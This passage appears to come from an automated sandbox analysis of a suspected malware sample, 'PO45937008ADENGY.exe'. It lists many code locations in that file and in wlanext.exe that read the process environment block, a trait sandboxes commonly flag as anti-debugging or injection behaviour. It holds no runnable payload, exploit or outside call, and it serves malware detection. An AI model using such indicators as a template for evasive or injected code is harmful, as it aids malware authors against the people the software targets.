Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134DBE9 mov eax, dword ptr fs:[00000030h] 9_2_0134DBE9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A53CA mov eax, dword ptr fs:[00000030h] 9_2_013A53CA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A53CA mov eax, dword ptr fs:[00000030h] 9_2_013A53CA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01364A2C mov eax, dword ptr fs:[00000030h] 9_2_01364A2C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01364A2C mov eax, dword ptr fs:[00000030h] 9_2_01364A2C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov eax, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov ecx, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov eax, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov eax, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132AA16 mov eax, dword ptr fs:[00000030h] 9_2_0132AA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132AA16 mov eax, dword ptr fs:[00000030h] 9_2_0132AA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01343A1C mov eax, dword ptr fs:[00000030h] 9_2_01343A1C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAA16 mov eax, dword ptr fs:[00000030h] 9_2_013EAA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAA16 mov eax, dword ptr fs:[00000030h] 9_2_013EAA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01338A0A mov eax, dword ptr fs:[00000030h] 9_2_01338A0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136927A mov eax, dword ptr fs:[00000030h] 9_2_0136927A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DB260 mov eax, dword ptr fs:[00000030h] 9_2_013DB260
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DB260 mov eax, dword ptr fs:[00000030h] 9_2_013DB260
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8A62 mov eax, dword ptr fs:[00000030h] 9_2_013F8A62
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EEA55 mov eax, dword ptr fs:[00000030h] 9_2_013EEA55
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013B4257 mov eax, dword ptr fs:[00000030h] 9_2_013B4257
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0133AAB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0133AAB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135FAB0 mov eax, dword ptr fs:[00000030h] 9_2_0135FAB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h] 9_2_0135D294
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h] 9_2_0135D294
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352AE4 mov eax, dword ptr fs:[00000030h] 9_2_01352AE4
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352ACB mov eax, dword ptr fs:[00000030h] 9_2_01352ACB
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132AD30 mov eax, dword ptr fs:[00000030h] 9_2_0132AD30
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EE539 mov eax, dword ptr fs:[00000030h] 9_2_013EE539
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8D34 mov eax, dword ptr fs:[00000030h] 9_2_013F8D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013AA537 mov eax, dword ptr fs:[00000030h] 9_2_013AA537
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h] 9_2_01354D3B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h] 9_2_01354D3B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h] 9_2_01354D3B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h] 9_2_0134C577
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h] 9_2_0134C577
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01347D50 mov eax, dword ptr fs:[00000030h] 9_2_01347D50
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01363D43 mov eax, dword ptr fs:[00000030h] 9_2_01363D43
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A3540 mov eax, dword ptr fs:[00000030h] 9_2_013A3540
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h] 9_2_01351DB5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h] 9_2_01351DB5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h] 9_2_01351DB5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h] 9_2_013F05AC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h] 9_2_013F05AC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013535A1 mov eax, dword ptr fs:[00000030h] 9_2_013535A1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h] 9_2_0135FD9B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h] 9_2_0135FD9B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013D8DF1 mov eax, dword ptr fs:[00000030h] 9_2_013D8DF1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0133D5E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0133D5E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov ecx, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135BC2C mov eax, dword ptr fs:[00000030h] 9_2_0135BC2C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F740D mov eax, dword ptr fs:[00000030h] 9_2_013F740D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F740D mov eax, dword ptr fs:[00000030h] 9_2_013F740D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F740D mov eax, dword ptr fs:[00000030h] 9_2_013F740D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134746D mov eax, dword ptr fs:[00000030h] 9_2_0134746D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h] 9_2_013BC450
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h] 9_2_013BC450
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A44B mov eax, dword ptr fs:[00000030h] 9_2_0135A44B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133849B mov eax, dword ptr fs:[00000030h] 9_2_0133849B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E14FB mov eax, dword ptr fs:[00000030h] 9_2_013E14FB
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h] 9_2_013A6CF0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h] 9_2_013A6CF0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h] 9_2_013A6CF0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8CD6 mov eax, dword ptr fs:[00000030h] 9_2_013F8CD6
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135E730 mov eax, dword ptr fs:[00000030h] 9_2_0135E730
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01324F2E mov eax, dword ptr fs:[00000030h] 9_2_01324F2E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01324F2E mov eax, dword ptr fs:[00000030h] 9_2_01324F2E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134F716 mov eax, dword ptr fs:[00000030h] 9_2_0134F716
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BFF10 mov eax, dword ptr fs:[00000030h] 9_2_013BFF10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BFF10 mov eax, dword ptr fs:[00000030h] 9_2_013BFF10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F070D mov eax, dword ptr fs:[00000030h] 9_2_013F070D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F070D mov eax, dword ptr fs:[00000030h] 9_2_013F070D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A70E mov eax, dword ptr fs:[00000030h] 9_2_0135A70E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A70E mov eax, dword ptr fs:[00000030h] 9_2_0135A70E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133FF60 mov eax, dword ptr fs:[00000030h] 9_2_0133FF60
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8F6A mov eax, dword ptr fs:[00000030h] 9_2_013F8F6A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133EF40 mov eax, dword ptr fs:[00000030h] 9_2_0133EF40
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01338794 mov eax, dword ptr fs:[00000030h] 9_2_01338794
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h] 9_2_013A7794
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h] 9_2_013A7794
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h] 9_2_013A7794
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013637F5 mov eax, dword ptr fs:[00000030h] 9_2_013637F5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DFE3F mov eax, dword ptr fs:[00000030h] 9_2_013DFE3F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132E620 mov eax, dword ptr fs:[00000030h] 9_2_0132E620
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A61C mov eax, dword ptr fs:[00000030h] 9_2_0135A61C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A61C mov eax, dword ptr fs:[00000030h] 9_2_0135A61C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h] 9_2_0132C600
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h] 9_2_0132C600
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h] 9_2_0132C600
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01358E00 mov eax, dword ptr fs:[00000030h] 9_2_01358E00
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1608 mov eax, dword ptr fs:[00000030h] 9_2_013E1608
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h] 9_2_0134AE73
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h] 9_2_0134AE73
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h] 9_2_0134AE73
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h] 9_2_0134AE73
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h] 9_2_0134AE73
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133766D mov eax, dword ptr fs:[00000030h] 9_2_0133766D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h] 9_2_01337E41
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h] 9_2_01337E41
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h] 9_2_01337E41
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h] 9_2_01337E41
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h] 9_2_01337E41
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h] 9_2_01337E41
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAE44 mov eax, dword ptr fs:[00000030h] 9_2_013EAE44
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAE44 mov eax, dword ptr fs:[00000030h] 9_2_013EAE44
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h] 9_2_013F0EA5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h] 9_2_013F0EA5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h] 9_2_013F0EA5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A46A7 mov eax, dword ptr fs:[00000030h] 9_2_013A46A7
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BFE87 mov eax, dword ptr fs:[00000030h] 9_2_013BFE87
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013376E2 mov eax, dword ptr fs:[00000030h] 9_2_013376E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013516E0 mov ecx, dword ptr fs:[00000030h] 9_2_013516E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8ED6 mov eax, dword ptr fs:[00000030h] 9_2_013F8ED6
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01368EC7 mov eax, dword ptr fs:[00000030h] 9_2_01368EC7
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013536CC mov eax, dword ptr fs:[00000030h] 9_2_013536CC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DFEC0 mov eax, dword ptr fs:[00000030h] 9_2_013DFEC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952397 mov eax, dword ptr fs:[00000030h] 17_2_03952397
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395B390 mov eax, dword ptr fs:[00000030h] 17_2_0395B390
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E138A mov eax, dword ptr fs:[00000030h] 17_2_039E138A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03931B8F mov eax, dword ptr fs:[00000030h] 17_2_03931B8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03931B8F mov eax, dword ptr fs:[00000030h] 17_2_03931B8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DD380 mov ecx, dword ptr fs:[00000030h] 17_2_039DD380
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h] 17_2_03954BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h] 17_2_03954BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h] 17_2_03954BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F5BA5 mov eax, dword ptr fs:[00000030h] 17_2_039F5BA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A53CA mov eax, dword ptr fs:[00000030h] 17_2_039A53CA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A53CA mov eax, dword ptr fs:[00000030h] 17_2_039A53CA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h] 17_2_039503E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h] 17_2_039503E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h] 17_2_039503E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h] 17_2_039503E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h] 17_2_039503E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h] 17_2_039503E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394DBE9 mov eax, dword ptr fs:[00000030h] 17_2_0394DBE9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E131B mov eax, dword ptr fs:[00000030h] 17_2_039E131B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8B58 mov eax, dword ptr fs:[00000030h] 17_2_039F8B58
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392F358 mov eax, dword ptr fs:[00000030h] 17_2_0392F358
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392DB40 mov eax, dword ptr fs:[00000030h] 17_2_0392DB40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03953B7A mov eax, dword ptr fs:[00000030h] 17_2_03953B7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03953B7A mov eax, dword ptr fs:[00000030h] 17_2_03953B7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392DB60 mov ecx, dword ptr fs:[00000030h] 17_2_0392DB60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395D294 mov eax, dword ptr fs:[00000030h] 17_2_0395D294
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395D294 mov eax, dword ptr fs:[00000030h] 17_2_0395D294
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 17_2_0393AAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 17_2_0393AAB0
